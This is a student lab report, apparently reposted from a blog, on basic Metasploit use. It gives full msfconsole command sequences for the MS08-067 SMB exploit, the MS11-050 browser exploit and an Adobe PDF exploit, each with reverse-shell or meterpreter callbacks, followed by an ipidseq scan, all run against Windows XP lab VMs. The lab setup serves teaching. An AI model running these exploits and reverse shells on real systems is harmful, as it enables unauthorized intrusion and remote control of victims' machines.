码迷,mamicode.com
首页 > 其他好文 > 详细

20155318 《网络攻防》Exp5 MSF基础应用

时间:2018-04-28 22:20:30      阅读:200      评论:0      收藏:0      [点我收藏+]

标签:图片   编码   拷贝   html_   其它   png   权限   file   目标   

20155318 《网络攻防》Exp5 MSF基础应用

基础问题

  • 用自己的话解释什么是exploit,payload,encode?
  • exploit就相当于是载具,将真正要负责攻击的代码传送到靶机中
  • payload也就相当于载荷,相当于我们之前实验的后门,exploit把它传送到靶机中后,它就负责执行相应的攻击代码。
  • encode也就是编码,主要是为了避免payload中坏字符影响功能,其次是为了伪装,不让杀毒软件很轻易的就发现payload是攻击代码。

实验步骤

Windows服务渗透攻击——MS08-067安全漏洞

  • 攻击机:kali,ip:192.168.153.129
  • 靶机:windows XP SP3(English),IP地址是192.168.153.130
  • 在kali输入msfconsole进入控制台后依次输入以下指令:

    use exploit/windows/smb/ms08_067_netapi
    set payload generic/shell_reverse_tcp//tcp反向回连
    set LHOST 192.168.153.129//此IP是kali的IP
    set LPORT 5318//端口
    set RHOST 192.168.153.130//此IP是靶机WIN XP的IP,特定漏洞端口已经固定
    set target 0
    exploit//进行攻击
  • 技术分享图片

  • 建立会话,攻击结果如下:
  • 技术分享图片

针对浏览器的攻击:MS11-050

  • 攻击机:kali,IP地址是192.168.153.129
  • 靶机:Windows XP Professional SP3 简体中文,IP地址是192.168.153.131
    在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

    msf > use windows/browser/ms11_050_mshtml_cobjectele
    msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
    msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.153.129 //攻击机ip
    msf exploit(ms11_050_cobjectelement) > set LPORT 5318 //攻击端口固定
    msf exploit(ms11_050_cobjectelement) > set URIPATH 5318lxy //统一资源标识符路径设置
    msf exploit(ms11_050_cobjectelement) > exploit

    技术分享图片

  • 在靶机访问http://192.168.153.129:8080/5318lxy
  • 技术分享图片

  • 会提示windows为了保护计算机已经关闭此程序
  • 技术分享图片

  • 将internet选项中和安全有关的都降级、关闭,允许运行和安装软件
  • 技术分享图片

  • 再次访问,还是失败
  • 技术分享图片

针对客户端的攻击:adobe_toolbutton

  • 攻击机:kali,ip:192.168.153.129
  • 靶机:Windows XP Professional SP3 简体中文,IP地址是192.168.153.131
  • 在msf下用search
  • 技术分享图片

  • 依次输入以下指令:

    msf > use windows/fileformat/adobe_cooltype_sing
    msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
    msf exploit(adobe_cooltype_sing) > set LHOST 192.168.153.129 //攻击机ip
    msf exploit(adobe_cooltype_sing) > set LPORT 5318 //攻击端口
    msf exploit(adobe_cooltype_sing) > set FILENAME exp5_5318.pdf //设置生成pdf文件的名字
    msf exploit(adobe_cooltype_sing) > exploit //攻击
  • 成功生成exp5_5318.pdf:
  • 技术分享图片

  • 技术分享图片

  • 将pdf文件传送或拷贝到靶机上后,在kali上输入back退出当前模块,进入监听模块,输入以下命令:

    msf > use exploit/multi/handler //进入监听模块
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
    msf exploit(handler) > set LHOST 192.168.153.131 //攻击机ip
    msf exploit(handler) > set LPORT 5318 //攻击端口固定
    msf exploit(handler) > exploit
  • 然后在靶机上打开20155312.pdf文件
  • 技术分享图片

  • 运行后,回连成功
  • 技术分享图片

  • 运行ipconfig命令
  • 技术分享图片

  • 靶机关闭pdf文件,主机失去权限
  • 技术分享图片

应用任何一个辅助模块:ipidseq

ipidseq
  • 功能:扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。

  • 拥有递增的IPID的空闲(空闲是指该主机在特定时间内不向网络发送数据包)主机(即显示为Incremental!的条目),不会被网络上的其它主机严重影响,可以用来进行TCP空闲扫描。

  • TCP空闲扫描:是一种高级的nmap扫描方式,这种扫描方式能让我们冒充网络上另一台主机的IP地址对目标进行更为隐秘的扫描。

  • 具体流程
  • 攻击机:kali,IP地址是192.168.153.132
  • 靶机:Windows XP Professional SP3 简体中文,IP地址是192.168.153.131
  • use auxiliary/scanner/ip/ipidseq
  • 查看需要设置的参数,设置完成后确认一下,然后就可以开始exploit了。
  • 技术分享图片

  • 设为对单一目标主机的扫描
  • 技术分享图片

  • 技术分享图片

  • 对指定网段的主机进行扫描:
  • 技术分享图片

实验总结

  • 本次实验我学会了MSF工具的一些常用指令,了解六个模块用法,整体实验流程并不复杂,但是使用浏览器的那个攻击我没有成功,尝试了其他多种方法也不行,打算等假期结束后再继续尝试。
  • 离实战还缺些什么技术或步骤?
  • 目前都只是针对XP系统进行攻击,还不能直接对现在的操作系统进行攻击,但是攻击原理应该是相同的。

20155318 《网络攻防》Exp5 MSF基础应用

标签:图片   编码   拷贝   html_   其它   png   权限   file   目标   

原文地址:https://www.cnblogs.com/lxy1997/p/8969539.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!